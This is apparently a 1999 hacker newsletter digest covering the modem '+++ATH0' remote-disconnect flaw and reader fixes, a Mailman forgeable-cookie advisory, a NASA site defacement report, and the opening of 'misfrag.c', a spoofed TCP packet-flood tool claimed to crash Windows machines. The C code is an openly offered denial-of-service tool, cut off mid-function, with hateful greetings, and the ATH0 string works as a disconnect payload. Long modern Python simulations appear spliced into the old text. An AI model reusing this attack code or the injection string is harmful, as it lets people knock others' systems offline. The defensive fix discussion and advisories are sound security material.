Another S register to be aware of (like S12 for the guard time) is S2; this is the register that actually holds the escape character, and there is no
reason why you cannot change that to something other than a +. Decent PPP modem control software should allow you to change this setting
within them without a problem, i.e. ATS2=27 (27 is the escape key on the keyboard; I cannot remember what the + is at the moment, but
using AT&V should tell you (assuming + is still set)).
Regards
Richard Smith
Customer Support
The Zones Online
Subject: modem security flaw - the final workaround
Date: Wed, 23 Jun 1999 09:05:04 +0200
From: Massimo Valle
I want to confirm the modem security flaw. On my iMac, receiving a ctcp ping + + +ATH0 causes the modem to disconnect. Also sending a
"/ctcp nickname ping + + +ATH0" to another user causes my iMac modem to disconnect.
I have a workaround that works, apparently without side effects.
The tip is to disable the escape sequence "+ + +" by setting the S2 register to 127. This is the correct setting for disabling the escape sequence, as
reported in the "AT commands" manual.
I've modified the original iMac modem script, adding S2=127, and all seems to work fine. Sending and receiving a ctcp ping with + + +ATH0 no
longer disconnects my iMac modem.
Also the PPP disconnects correctly when I request "Disconnect" from Remote Access.
I think this works also for G3 and Powerbook G3.
enjoy it!!
Massimo Valle
ITALY
Date: Wed, 23 Jun 1999 18:34:25 -0500
From: Matt
Subject: Modem Flaw Workaround Works!
Another note for your readers:
Massimo Valle's solution of adding S2=127 to the modem init string works great.
I tested it twice by removing the string and re-sending the + + + A T H command to myself by email...kicked right off immediately.
Replaced the sequence in the init string, sent again, nothing at all happened, it sent normally.
Thanks Massimo!!
Matt Perkins
Michigan USA
Date: Thu, 24 Jun 1999 01:46:31 -0400
Subject: modem flaw -- followup
From: "Jason Y. Kim"
Confirmed! Setting S2 register to 128 (manual says anything ABOVE 127 will work) fixed the modem problem on my iMac. I can now send
email to myself with the modem hangup command in the subject line and body without getting immediately disconnected. And I can still
disconnect manually whenever I want.
THANK YOU MACINTOUCH.
--argonaut
Date: Thu, 24 Jun 1999 12:38:24 -0400
Subject: iMac Modem Security Fix ready for download
From: "Chris Dembitz"
To: Ric Ford
I have modified the two iMac modem scripts with the suggested modification of adding S2=128 to the init string. I made an Applescript
installer that will replace the older versions with these (unsupported) modified versions. It is available at [imacscriptupdate.sit] It is in Stuffit 5
format. Please note this is an unsupported, unwarranted fix. Hope this helps.
--
Christopher J. Dembitz
General Manager
NetRamp Internet Services, Inc.
Tidewater, Virginia's Only All-Mac ISP
Date: Fri, 25 Jun 1999 10:24:56 -0400
Subject: Update to script update
From: "Chris Dembitz"
I have updated the iMac script update installer so it now gives the option to reinstall the old scripts (since those were getting copied over
without being backed up). The url to download it has not changed.
Chris
Date: Thu, 24 Jun 1999 22:30:56 -0400
From: Cristian
Subject: Quick Guide: Solving Modem Bug (DoS)
Hi Ric! Thanks for such a good followup on the Modem Bug...
After spending an hour trying to understand what exactly should be done on my Internal Apple 56k modem (350 BW G3) to fix the problem, I
concluded:
5 easy steps:
1. Get offline!
2. Launch Zterm (or similar terminal program)
3. Type ATZ enter (resets modem to default settings)
4. Type ATS2=128 enter (sets S2 register to 128, disabling escape sequence)
5. Type AT&W&W1 enter (stores the new settings to default)
Now, to verify this worked, switch your modem off/on (or shutdown if internal). Open Zterm, type ATZ enter and then type AT&V enter. This
will display your default settings. You want S2 (or S02) to be equal to 128. You'd probably read: S02:128
-Cristian Viola.
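To make the register behaviour in these reports concrete (the guard time in S12, the escape character in S2, a TIES modem that stores S12 but never consults it, and Cristian's ATS2=128 fix), here is an added Python model of a modem's escape-sequence detector; it is an illustration written for this digest, not code from MacInTouch, HNN or any modem vendor, and the echo traffic, timings and ATH/ATS handling are constructed simplifications. It also shows the trade-off the ARA scripts above deal with: once S2 is above 127 the +++ hangup path no longer works, so the driver has to fall back to dropping DTR.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

CR = 13  # S3 default: a carriage return ends a command line


@dataclass
class Modem:
    s2: int = 43          # S2 escape character ('+' = 43); any value above 127 disables it
    s12: int = 50         # S12 guard time in 1/50 s units (50 = one second)
    ties: bool = False    # Time Independent Escape Sequence: S12 is stored but never used
    online: bool = True   # carrier up, modem in data (connect) mode
    command_mode: bool = False
    executed: list = field(default_factory=list)
    _run: int = 0                     # consecutive escape chars seen so far
    _last_t: Optional[float] = None   # arrival time of the last byte from the computer
    _third_t: Optional[float] = None  # arrival time of the third escape char
    _cmd: bytearray = field(default_factory=bytearray)

    def send(self, t: float, data: bytes) -> None:  # bytes from the DTE side at time t (s)
        for b in data:
            self._byte(t, b)

    def idle(self, t: float) -> None:  # no data until t: a pending guarded escape completes
        if self._third_t is not None and t - self._third_t >= self.s12 / 50.0:
            self._enter_command_mode()

    def drop_dtr(self) -> None:  # hardware hangup via the DTR line, independent of S2/S12
        self.online, self.command_mode = False, True

    def _byte(self, t: float, b: int) -> None:
        if self.command_mode:
            self._command_byte(b)
            return
        guard = self.s12 / 50.0                  # guard time in seconds
        if self._third_t is not None:            # escape seen, waiting for trailing silence
            if t - self._third_t >= guard:       # silence elapsed first: it was an escape
                self._enter_command_mode()
                self._command_byte(b)
                return
            self._third_t = None                 # data followed too soon: it was just data
            self._run = 0
        quiet = self._last_t is None or t - self._last_t >= guard
        self._last_t = t
        if self.s2 > 127 or b != self.s2:        # escape disabled, or an ordinary byte
            self._run = 0
            return
        if not self.ties:
            if self._run == 0 and not quiet:     # no leading guard time: treat as data
                return
            if self._run > 0 and quiet:          # long gap inside the run: start over
                self._run = 0
        self._run += 1
        if self._run == 3:
            self._run = 0
            if self.ties:
                self._enter_command_mode()       # TIES: no trailing silence required
            else:
                self._third_t = t                # wait for the trailing guard time

    def _enter_command_mode(self) -> None:
        self.command_mode, self._third_t, self._run = True, None, 0
        self._cmd = bytearray()

    def _command_byte(self, b: int) -> None:
        b &= 0x7F                                # command mode strips the high bit
        if b != CR:
            self._cmd.append(b)
            return
        line = self._cmd.decode("ascii").upper()
        self._cmd = bytearray()
        if not line.startswith("AT"):
            return
        self.executed.append(line)
        if line[2:3] == "H":                     # ATH / ATH0: hang up
            self.online = False
        for reg, val in re.findall(r"S(\d+)=(\d+)", line):   # ATS2=128, ATS12=50, ...
            if reg in ("2", "12"):
                setattr(self, "s" + reg, int(val))


def inject(modem: Modem, payload: bytes) -> bool:  # constructed echo traffic, one burst
    modem.send(0.0, b"ECHO REPLY seq=1 ")
    modem.send(0.01, payload + b" end")            # embedded string, no silence around it
    modem.idle(5.0)
    return modem.online                            # True: the modem shrugged it off


def legit_hangup(modem: Modem) -> bool:  # the PPP driver's own hangup: pause, +++, pause, ATH
    modem.send(0.0, b"data")
    modem.send(1.5, b"+++")
    modem.idle(3.0)
    modem.send(3.1, b"ATH\r")
    return not modem.online                        # False means fall back to drop_dtr()


def apply_fix(modem: Modem) -> int:  # Cristian's steps: get offline, type ATS2=128, dial back
    modem.online, modem.command_mode = False, True
    modem.send(0.0, b"ATS2=128\r")
    modem.online, modem.command_mode = True, False
    return modem.s2
```

A guarded modem with S12=50 treats the burst as data, the TIES modem executes ATH0 whatever S12 says, and after ATS2=128 both ignore it, at the cost of the +++ hangup path.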
Date: Thu, 24 Jun 1999 11:48:32 -0700
From: Jim Stoneburner
Subject: Modem workaround problems; Hangup delay solution
Hello,
(1) Modem flaw workaround causes problems
I tried some of the recommended workarounds and found that it made my modem unusable _depending_ on which modem script I use.
My modem is a Global Village Modem x2 56k external, on a PowerCenter running OS 7.6.1 and OT/PPP 1.0.1. I have two modem scripts
for ARA 2.1/OT-PPP on hand, two different generations of x2 scripts from Global Village.
The version 1.0.9 script worked great after I added "S2=127" to the init string (just after "S0=0"), solving the undesired disconnects if I try to
send an email containing "+ + + ATHO".
However, version 1.0.7 would not work. When trying to dial, the menubar "speedometer" would show data burst at 2 or 3 per second, and the
process would stall. Sometimes, a restart was required to escape the process. I tried this with "S2=128", and in different places in the string
of AT commands, but no luck.
(2) Hangup delays: a possible solution
Normally, I would simply use the newer script, especially since it functions with the "S2=127" workaround. However, the older script
disconnects _much_ faster than the new one -- 2 seconds as opposed to 10. I don't understand enough about these scripts to tell why the
earlier version doesn't work with the modification, or why it disconnects more rapidly. Being an experimental scientist, I tried a few things....
First, I read the scripts and identified the few differences between them. I then did some experimentation by commenting out or swapping out
code. This narrowed down the cause of slow disconnects to a section near the end of the script labeled "Hang up and reset the modem."
(The init string made no difference, by the way.) The revision list at the top of the v1.0.9 script includes the entry:
! 1.0.8 06/11/97 GAS Fixed hang up code and added TIES support
So, I tried replacing the subsection in v1.0.9 labeled
Escape from data to command mode using TIES + + + AT\13 command
with one from the older v1.0.7 script labeled:
Escape from data to command mode using standard + + + command.
This eliminated most of the hangup delays. Restoring the newer code, I then experimented with simply shortening the "pause" statements in
this section, but this was not enough to noticeably shorten the delay.
Perhaps one of your readers can help us understand the benefits of the newer code (if any), and how to speed up the disconnects now that a
major cause has been identified. I'd also be interested in whether other readers can confirm these observations. At present, I am stuck either
with the newer script with its slow disconnects but a successful workaround to the defect, or the older script with its fast disconnects but no
workaround.
Best wishes,
Jim
Attachment 1: Hang up code from v1.0.9 of Global Village x2 script
! Escape from data to command mode using TIES + + + AT\13 command
!
pause 60
write "+++"
pause 30
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "AT\13"
matchread 60
!
@LABEL 94
! Force a hangup
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
DTRClear
Pause 5
DTRSet
flush
!
!
! Try the hangup sequence three times otherwise declare an error
inctries
pause 120
iftries 3 101
jump 91
!
@LABEL 96
! Pause between data and command mode
pause 50
jump 94
!
!
@LABEL 98
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&F1E1\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!
Attachment 2: Hangup code from v1.0.7 of "GV x2 for ARA 2.1/OT-PPP"
! ---- Hang up and reset modem ----
!
@HANGUP
!
! If we do this too long, exit.
iftries 1225 99
!
@LABEL 90
!
settries 0
HSReset 0 0 0 0 0 0
!
@LABEL 91
!
! Try to get control of the modem
!
DTRClear
Pause 5
DTRSet
flush
!
@LABEL 94
!
! Force a hangup
!
matchclr
matchstr 1 98 "NO CARRIER\13\10"
matchstr 2 98 "OK\13\10"
matchstr 3 98 "ERROR\13\10"
matchstr 4 98 "0\13\10"
matchstr 5 98 "DELAYED"
matchstr 6 98 "BLACKLISTED"
write "ATH\13"
matchread 30
!
! Try again to get control of the modem by toggling DTR
!
@LABEL 95
DTRClear
Pause 5
DTRSet
flush
!
!
! Escape from data to command mode using standard +++ command
!
matchclr
matchstr 1 96 "OK\13\10"
pause 15
write "+++"
matchread 15
!
!
! Try the hangup sequence three times otherwise declare an error
!
inctries
iftries 3 101
jump 95
!
@LABEL 96
!
! Pause between data and command mode
!
pause 50
jump 94
!
!
@LABEL 97
!
! AT&F1 resulted in Error, try again using AT&F
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
write "AT&FS0=0\13"
matchread 30
jump 101
!
@LABEL 98
!
! Got control of the modem. Recall the factory settings. If it fails, jump 97.
!
pause 15
matchclr
matchstr 1 99 "OK\13\10"
matchstr 2 97 "ERROR\13\10"
write "AT&F1S0=0\13"
matchread 30
jump 101
!
@LABEL 99
exit 0
!
!
Date: Fri, 25 Jun 1999 07:58:28 -0400
Subject: Modem Security flaw
From: Steve Crossman
Hi Ric,
I just wanted to say that the S2=127 added to the initialization string of my modem in my G3-233 Wallstreet PowerBook has fixed the
problem you had described. I also don't get knocked offline anymore, which was so frequent that I thought I had a bad modem or phone line.
It is hard to believe GV & Apple could engineer something like this into the PB with this kind of problem. Thanks to your page for the fix.
Steve Crossman
Date: Thu, 24 Jun 1999 21:05:59 -0400
From: M J McCaffrey
Subject: GV 56K + + + ATH fix script
Ric--
I have successfully modified the "PowerBook G3 Internal 56K" ARA connect script to implement the S2 register setting described by several
readers as a "fix" for the guard-time attack.
I have tested it on my own system (a PowerBook G3 Series/250 with the 56K internal modem) both with the original script and the modified
script, and am satisfied it fixes the problem. (I tested by sending an e-mail to myself with the problem string in the body of the message --
sure enough, with the original I'm knocked offline immediately, and with the modified script it's no longer a problem.)
I have posted the script at the following URL:
/modemFix/index.html
The script itself is about a 40K download.
Please consider making this available to your readers in your next edition. Thanks!
--Matt McCaffrey
PS: I have had this problem since I started using my internal modem on 56K lines, and it has bugged the living daylights out of me. Thank you
for helping get the word out! (And as always, thanks for MacInTouch!)
Date: Fri, 25 Jun 1999 17:38:02 -0700
From: Kent Sorensen
Subject: Snak version 3.0.1 is released - IRC Client for Mac
Dear Editor,
Snak is a full featured IRC client with some unique and very useful features. It's fast, efficient and easy to use, and it is being updated and
enhanced regularly.
Version 3.0.1 has now been released and can be downloaded from [www.snak.com]
This version blocks the so-called ATH attack from disconnecting your modem via IRC. The attack uses a flaw in some modems to cause it
to disconnect, by sending it a particular string of text. This string is now stopped and changed, so the modem will not react to it. ...
From: Mitchell Burnside Clapp
Date: Fri, 25 Jun 1999 13:17:31 EDT
Subject: Modem Guard Mode/Security defect: Fix for AOL users
For AOL users, the modem script in the system folder is apparently never called. The AOL client does its own modem configuration.
To implement the S2=128 fix discussed on MacInTouch, you need to select the setup button from your sign on screen. Select the "Expert
Setup", "Edit," "Modem Options," and "Advanced settings" buttons in order. Type the characters "S2=128" at the end of the string of letters in
the "Configuration" box. Save your way back out to the sign on screen. (You may be asked to save the modem settings as a copy under a
new name. I called mine "GV Internal modem 56K fix" and double-checked to make sure it was selected as the modem for the location I
was editing).
I was able to send myself e-mail containing the infamous "+ + + A T H" sequence without getting dropped, whereas before it was a reliable
way of kicking me off-line every time.
Mitchell Burnside Clapp
CEO
Pioneer Rocketplane
Background Information
From: "Wong, Robert"
Subject: modem guard problem
Date: Thu, 24 Jun 1999 10:35:53 -0700
Hi,
A long time ago, I used to administer the ZyXEL modem FAQ. One of the questions was about how the ZyXEL modems dealt with the
modem guard sequence. If you read onwards, you will notice an excerpt from BoardWatch mag. This excerpt describes how ZyXEL got
around the Hayes patent. RWW.
Subject: T.6 How do ZyXEL modems deal with escape sequences?
Byte Magazine, V18, N8, July 1993, pg 184 has a good background article about escape sequences. The information below is a
less technical explanation of escape sequences.
An escape sequence switches a modem from transmission mode to command mode.
Sometimes, an AT command needs to be issued to the modem when it is on-line and connected with another modem. Since the
modem is on-line, typing an AT command would send the AT command down the connection to the other modem. Thus the
local modem never receives and acts on the AT command. An escape sequence is needed to bring the local modem into
command mode (without dropping the connection to the other modem).
One escape sequence is to drop the DTR (Data Terminal Ready) signal on one of the wires in the serial cable. This is a reliable
escape sequence. Some hardware platforms do not have a wire for the DTR signal and therefore cannot perform this escape
sequence. Another type of escape sequence is needed.
An alternate escape sequence is a pause, followed by three escape characters, and then another pause. This escape sequence
then puts the modem into command mode, allowing entry of AT commands. (The pauses prevent the modem from mistaking
escape characters in the data stream for "true" escape characters in an escape sequence.)
Hayes has a patent on the pause, escape characters, and pause technique. Other modem manufacturers are required to pay
royalties to Hayes for use of its patent. Some modem makers are not using the Hayes patent or any other method of
distinguishing real escape characters. This causes factory configured modems from these modem manufacturers to
inadvertently go into command mode when the Hayes test file is transmitted.
Taken from Byte Magazine, V18, N8, July 1993, pg 184 without permission:
"Zyxel [sic] has its own algorithm, for which it claims compatibility with existing code. Since the Zyxel [sic] algorithm is
proprietary, we can't comment on its strength or weakness. However, it caused no problem in our testing."
Taken from BoardWatch Magazine, V6, N9, November 1992 without permission:
"To illustrate the technical elegance of this [ZyXEL] modem, recall our article on the Hayes brouhaha over their fixed guard
time escape sequence under the Heatherington 302 patent. Hayes has licensed numerous modem manufacturers to use this
escape sequence. A few have not licensed it and often, their modems will escape to command mode while transmitting files
containing +++ escape sequences. Hayes caused something of a furor in July by releasing a text file that if transmitted by many
modems that don't use the guard time escape sequence technique, would abort the transfer and improperly escape to command
mode. Multitech's modems fail the test rather awkwardly. The ZyXEL modem does NOT license the Hayes escape sequence.
According to Gordon Yang, they use a proprietary variable sampling algorithm that does the job at least as well. We tried the
ZyXEL on the Hayes test file - and sure enough, it worked like a champ. ZyXEL appears to have engineered a way around the
escape sequence controversy. Yang indicates that they could conceivably publish the algorithm. If they did, this would take
some serious steam out of the Hayes licensing program."
Robert Wong
O'Reilly's dictionary of data communications terms includes a discussion of escape guard systems under "TIES" - Time Independent Escape
Sequence
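To make the escape-sequence mechanics concrete, here is a small simulation (an added example of my own, not part of Robert Wong's post or the MacInTouch letters) of three escape detectors: a Hayes-style guard-time detector, a TIES-style detector that needs no silence around "+++", and a detector with S2 set to 128 as in the AOL fix above. The one-second guard time, the `Modem` class and its method names are assumptions of the example; the inputs are a constructed mail body carrying the problem string at line speed and a deliberate escape typed with pauses, the latter to show that the guard-time modem still honours a real escape.

```python
from dataclasses import dataclass
from typing import List, Tuple

# A stream is a list of (seconds of silence before this character, character).
Stream = List[Tuple[float, str]]


def at_line_speed(text: str) -> Stream:
    """Constructed input: characters arriving back to back, as a mail body
    scrolls across the link with no pauses around the problem string."""
    return [(0.0, ch) for ch in text]


# Constructed: a message whose body happens to contain the problem string.
PROBLEM_MAIL = at_line_speed("Subject: hi\r\n\r\n+++ATH0\r\nbye\r\n")

# Constructed: a user escaping on purpose, pausing before and after "+++".
DELIBERATE_ESCAPE: Stream = [(2.0, "+"), (0.0, "+"), (0.0, "+"),
                             (2.0, "A"), (0.0, "T"), (0.0, "H"), (0.0, "0"), (0.0, "\r")]


@dataclass
class Modem:
    """Toy escape detector.  guard_time is the silence (seconds, assumed 1 s)
    a Hayes-style modem requires on both sides of "+++"; 0.0 models a
    TIES-style modem that needs none.  escape_char is the S2 register; a
    value of 128 or more turns escape recognition off (the S2=128 fix)."""
    guard_time: float = 1.0
    escape_char: int = ord("+")
    online: bool = True
    command_mode: bool = False
    _run: int = 0           # escape characters seen in the current candidate
    _pending: bool = False  # "+++" seen; waiting to see whether silence follows
    _cmd: str = ""          # command line being collected in command mode

    def feed(self, data: Stream) -> None:
        for gap, ch in data:
            if self.command_mode:
                self._command_char(ch)
            elif self.escape_char >= 128:
                pass                          # escape recognition disabled
            elif self._pending:
                self._pending = False
                if gap >= self.guard_time:    # trailing silence: genuine escape
                    self.command_mode = True
                    self._command_char(ch)
            elif ch == chr(self.escape_char):
                if self._run == 0 and gap < self.guard_time:
                    continue                  # no leading silence: ordinary data
                self._run += 1
                if self._run == 3:
                    self._run = 0
                    if self.guard_time == 0.0:
                        self.command_mode = True   # TIES: no trailing pause needed
                    else:
                        self._pending = True
            else:
                self._run = 0
        if self._pending:                     # data stopped, which is silence
            self._pending = False
            self.command_mode = True

    def _command_char(self, ch: str) -> None:
        if ch not in "\r\n":
            self._cmd += ch
            return
        cmd = self._cmd.upper()
        self._cmd = ""
        if cmd.startswith("ATH"):
            self.online = False               # hang up
        elif cmd.startswith("ATO"):
            self.command_mode = False         # return to data mode


def stays_online(modem: Modem, data: Stream) -> bool:
    """Feed a stream and report whether the connection survived it."""
    modem.feed(data)
    return modem.online
```

Run against `PROBLEM_MAIL`, the TIES-style modem drops the line, the guard-time modem ignores the string because no silence precedes it, and either modem with S2=128 ignores it; the deliberate escape with pauses still hangs up the guard-time modem, which is why the S2=128 fix costs you the ability to escape with "+++" at all.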
100.0 Another government server cracked today
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 26th
From www.403-security.org
Another NASA site got hacked
Astral 26.06.1999 22:25
Today another NASA site was hacked; this time it is http://microgravity.msfc.nasa.gov/. Keebler hacked
all these government sites in the last few weeks. This is just another hacked site in a series of government website
hacks. Check the archive of this hack in the Hacked Sites section.
http://www.403-security.org/Htmls/hacked_sites.htm
@HWA
101.0 MailMan.cookie attack
~~~~~~~~~~~~~~~~~~~~~
June 26th from PacketStorm Security
http://www.python.org/pipermail/mailman-developers/1999-June/001128.html
John Morton jwm@plain.co.nz
Thu, 10 Jun 1999 18:14:42 +1200 (NZST)
[Didn't see this problem discussed in the recent archive messages, so...]
I was looking at the code for the admin cgi in search of a good cookie
authentication system, and found out that it was doing this,
c = Cookie.Cookie( os.environ['HTTP_COOKIE'] )
if c.has_key(list_name + "-admin"):
    if c[list_name + "-admin"].value == `hash(list_name)`:
        return 1
...to authenticate based on a cookie. This code is from 1.0b8, but it
only took a couple of minutes to set the appropriate wafer in my
junkbuster configuration, and point netscape at the admin page for
mailman-developers. I'll leave the replication of this exploit as an
exercise for the readers.
Possible solutions:
Lock down that url with whatever security features your web server
has. This sucks as a long term solution, but it should protect from
disgruntled script kiddies that you just chucked off your lists.
Make the value based on a hash of some slow changing system
variable. Something that changes with the frequency of your desired
expire time, for example. Maybe a cron job to set a key based on some
fast changing system stats every hour or so.
Use SSL for the admin interface and save the name and password in the
cookie.
Any better suggestions?
John.
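The weakness John describes, and the kind of fix his second and third suggestions point at, side by side as an audit check. This is an added example of my own, not Mailman's code or its eventual fix: `weak_is_admin` reproduces the pattern above (a value computed from the list name alone), while `issue_admin_cookie` and `keyed_is_admin` are an assumed design that binds the cookie to a server-side secret and an expiry with an HMAC. Python 3 randomises `hash()` per process, so an MD5 of the list name stands in for the deterministic 1.x `hash(list_name)`; the list name and timestamps are constructed.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie
from typing import Dict, Optional


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Same job as Cookie.Cookie(os.environ['HTTP_COOKIE']) in the post."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def weak_cookie_value(list_name: str) -> str:
    # Stand-in for the 1.0b8 `hash(list_name)`: a deterministic function of
    # public information, so anyone who knows the list name can compute it.
    return hashlib.md5(list_name.encode()).hexdigest()


def weak_is_admin(cookie: Dict[str, str], list_name: str) -> bool:
    # The pattern from the post: no secret and no password is involved.
    return cookie.get(list_name + "-admin") == weak_cookie_value(list_name)


# Assumed: a per-installation secret generated once and kept server side.
SERVER_KEY = secrets.token_bytes(32)


def _mac(list_name: str, expires: int, key: bytes) -> str:
    return hmac.new(key, f"{list_name}:{expires}".encode(), hashlib.sha256).hexdigest()


def issue_admin_cookie(list_name: str, ttl_seconds: int, key: bytes = SERVER_KEY,
                       now: Optional[float] = None) -> str:
    """Issued only after the real admin password has been checked (not shown)."""
    expires = int((time.time() if now is None else now) + ttl_seconds)
    return f"{expires}:{_mac(list_name, expires, key)}"


def keyed_is_admin(cookie: Dict[str, str], list_name: str, key: bytes = SERVER_KEY,
                   now: Optional[float] = None) -> bool:
    value = cookie.get(list_name + "-admin", "")
    expires_s, _, mac = value.partition(":")
    if not expires_s.isdigit():
        return False
    expires = int(expires_s)
    if (time.time() if now is None else now) > expires:
        return False                      # the expiry the post asks for
    # Constant-time compare; a forged value needs the key, not the list name.
    return hmac.compare_digest(mac, _mac(list_name, expires, key))
```

The first suggestion in the post (web-server access control on the URL) is still worth having as defence in depth, but it is the keyed, expiring value that removes the predictability: the list name is public, the key is not.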
---------------------------------------------------------------------------
Date: Tue, 22 Jun 1999 21:06:34 -0700
From: debian-security-announce@LISTS.DEBIAN.ORG
Reply-To: security@debian.org
Subject: [SECURITY] New versions of mailman fixes cookie attack
-----BEGIN PGP SIGNED MESSAGE-----
We have become aware that the version of mailman as supplied in Debian
GNU/Linux 2.1 has a problem with verifying list administrators. The
problem is that the cookie value generation used was predictable, so
using forged authentication cookies it was possible to access the
list administration webpages without knowing the proper password.
More information about this vulnerability can be found at
http://www.python.org/pipermail/mailman-developers/1999-June/001128.html
This has been fixed in version 1.0rc2-5.
We recommend you upgrade your mailman package immediately.
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
Debian GNU/Linux 2.1 alias slink
- --------------------------------
This version of Debian was released only for Intel, the Motorola
680x0, the alpha and the Sun sparc architecture.
Source archives:
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.diff.gz
MD5 checksum: 096d96ebf89341b148d2ae917037559a
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2-5.dsc
MD5 checksum: a407c72b6d80163b04ddc5fb895b8fbd
http://security.debian.org/dists/stable/updates/binary-source/mailman_1.0rc2.orig.tar.gz
MD5 checksum: 6916959db9144ecaf004fcd9be32a020
Alpha architecture:
http://security.debian.org/dists/stable/updates/binary-alpha/mailman_1.0rc2-5_alpha.deb
MD5 checksum: 0f053b62d9dd51d4e2c0843258eee453
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/binary-i386/mailman_1.0rc2-5_i386.deb
MD5 checksum: d9b0f93458a41055ba1b39891e0a5ca5
Motorola 680x0 architecture:
http://security.debian.org/dists/stable/updates/binary-m68k/mailman_1.0rc2-5_m68k.deb
MD5 checksum: 94fc7996e4b296a4c944fe08ccb44503
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/binary-sparc/mailman_1.0rc2-5_sparc.deb
MD5 checksum: e27d100b24d0c87c02cc86b7aadded0d
These files will be copied into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
Please note you can also use apt to always get the latest security
updates. To do so add the following line to /etc/apt/sources.list:
deb http://security.debian.org/ stable updates
- --
Debian GNU/Linux . Security Managers . security@debian.org
debian-security-announce@lists.debian.org
Christian Hudon . Wichert Akkerman . Martin Schulze
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
iQB1AwUBN3Av9KjZR/ntlUftAQFFjwL/VwNslEzha3yT4k3wwDSedm0XEiHIUCS1
+ngWFIrPnLzfJ/jK2atXAZc98wwFxjxOTDWnGuc4RBjRi4NqBduQsVwaIHelSbK2
u9uPiNvzUhPiCUdzDusjy8ysUmzJIHd8
=PgQB
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to debian-security-announce-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
@HWA
102.0 misfrag.c nasty piece of code from P.A.T.C.H
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/******** ***** ********* ***** * *
* * * * * * * * * *
******** * *** * * * * *** *
* * * * * * *
* [*] * * [*] * [*] ****** [*] * * [*]
P e o p l e A l l - f o r t o o l s c a u s i n g h e l l
*/
/*********************************************************************
*
* P.A.T.C.H.
* t h e b r i g a d e
* [http://thebrigade.8m.com]
*
* coded by misteri0 from P.A.T.C.H.
* [mailto:leet@ibw.com.ni]
*
* Description: [ Sends 2 packets per packet that you give out ]
* [ and per every packet it increments the dest/source port by 1 ]
* [ the packets are spoofed, and it sends 1 packet using TH_SYN and another with TH_ACK ]
* [ crashes operating systems: Windows NT4 / Win95 / Win98 ]
* [ crashed a Windows NT4 / Win95 / Win98 from my computer sending 2000 packets starting from 0 ports ]
* greets: codesearc, Nforcer, Punk182, everyone in #ehforce, Evilfurby, ^clAw^
* people in #bitchx, folks in #c, and the lame people in #nicaragua for being such dicks
* with me which if it wasn't for them I would not have decided to code
* fuck u's: Ellison you stupid cocksucking piece of shit son-of-a-bitch, I wish you nothing but pain.
* Nsurfer~1 for being the lamest BO user ever
* the fuckheads in #trenchcoatmafia (hey code you remember how they fell like rocks?? :-))
*******************************************************************************************************/
/*--------- code ----------- */
#define _BSD_SOURCE
/* BSD compatibility */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
unsigned short
in_cksum (unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return (answer);
}
int sendpack( int s, u_long srcaddr, u_short srcport, u_long dstaddr, u_short dstport,u_short th_flags, u_char *packet,u_long length) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in foo;
struct in_addr srcinaddr,dstinaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&foo,sizeof(foo));
/* only BSD, linux has plain u_long declared */
srcinaddr.s_addr = srcaddr;
dstinaddr.s_addr = dstaddr;
/* building packets */
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 0;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = 4; /* 4 */
ip->ip_hl = 5; /* 5 */
ip->ip_id = 1234; /* 1234 */
ip->ip_src = srcinaddr;
ip->ip_dst = dstinaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40; /* 40 */
ip->ip_off = 0;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr)
+ length;
tcp->th_sport = htons(srcport);
tcp->th_dport = htons(dstport);
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(rand());
tcp->th_off=1;
tcp->th_flags = th_flags;
tcp->th_urp = 0; /* 0 */
tcp->th_sum = in_cksum((u_short *) pseudo,
sizeof(struct pseudo) +
